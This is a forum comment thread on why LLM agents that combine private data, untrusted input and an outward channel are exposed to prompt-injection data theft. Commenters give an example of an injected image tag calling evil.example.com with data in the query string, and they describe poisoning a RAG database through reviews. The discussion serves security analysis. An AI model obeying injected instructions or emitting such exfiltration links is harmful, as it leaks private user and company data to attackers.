Comment by quuxplusone
3 days ago
Can you elaborate? How does an attacker turn "any of your users can even access the output of a chat or other generated text" into a means of exfiltrating data to the attacker?
Are you just worried about social engineering — that is, if the attacker can make the LLM say "to complete registration, please paste the following hex code into evil.example.com:", then a large number of human users will just do that? I mean, you'd probably be right, but if that's "all" you mean, it'd be helpful to say so explicitly.
Ah, perhaps answering myself: if the attacker can get the LLM to say "here, look at this HTML content in your browser: ... img src="https://evil.example.com/exfiltrate.jpg?data= ...", then a large number of human users will do that for sure.
Yes, even a GET request can change the state of the external world, even if that's strictly speaking against the spec.
Wasn't there a HN post where someone made their website look different to LLMs or webscrapers than a typical user? I can't seem to find the post but that could add an extra layer (I mean it is all different if you're viewing from a browser vs curl)
Yes, and get requests with the sensitive data as query parameters are often used to exfiltrate data. The attackers doesn't even need to set up a special handler, as long as they can read the access logs.
Once again affirming that prompt injection is social engineering for LLMs. To a first approximation, humans and LLMs have the same failure modes, and at system design level, they belong to the same class. I.e. LLMs are little people on a chip; don't put one where you wouldn't put the other.
They are worse than people: LLM combine toddler level critical thinking with intern level technical skills, and read much much faster than any person can.
1 reply →
So if an agent has no access to non-public data, that's (A) and (C) - the worst an attacker can do, as you note, is socially engineer themselves.
But say you're building an agent that does have access to non-public data - say, a bot that can take your team's secret internal CRM notes about a client, or Top Secret Info about the Top Secret Suppliers relevant to their inquiry, or a proprietary basis for fraud detection, into account when crafting automatic responses. Or, if you even consider the details of your system prompt to be sensitive. Now, you have (A) (B) and (C).
You might think that you can expressly forbid exfiltration of this sensitive information in your system prompt. But no current LLM is fully immune to prompt injection that overrides its system prompt from a determined attacker.
And the attack doesn't even need to come from the user's current chat messages. If they're able to poison your database - say, by leaving a review or comment somewhere with the prompt injection, then saying something that's likely to bring that into the current context via RAG, that's also a way of injecting.
This isn't to say that companies should avoid anything that has (A) (B) and (C) - tremendous value lies at this intersection! The devil's in the details: the degree of sensitivity of the information, the likelihood of highly tailored attacks, the economic and brand-integrity consequences of exfiltration, the tradeoffs against speed to market. But every team should have this conversation and have open eyes before deploying.
Your elaboration seems to assume that you already have (C). I was asking, how do you get to (C) — what made you say "(C) extends to any situation where any of your users can even access the output of a chat or other generated text"?
I think it’s because the state is leaving the backend server running the LLM and output to the browser, where various attacks are possible to send requests out to the internet (either directly or through social engineering).
Avoiding C means the output is strictly used within your system.
These problems will never be fully solved given how LLMs work… system prompts, user inputs, at the end of the day it’s all just input to the model.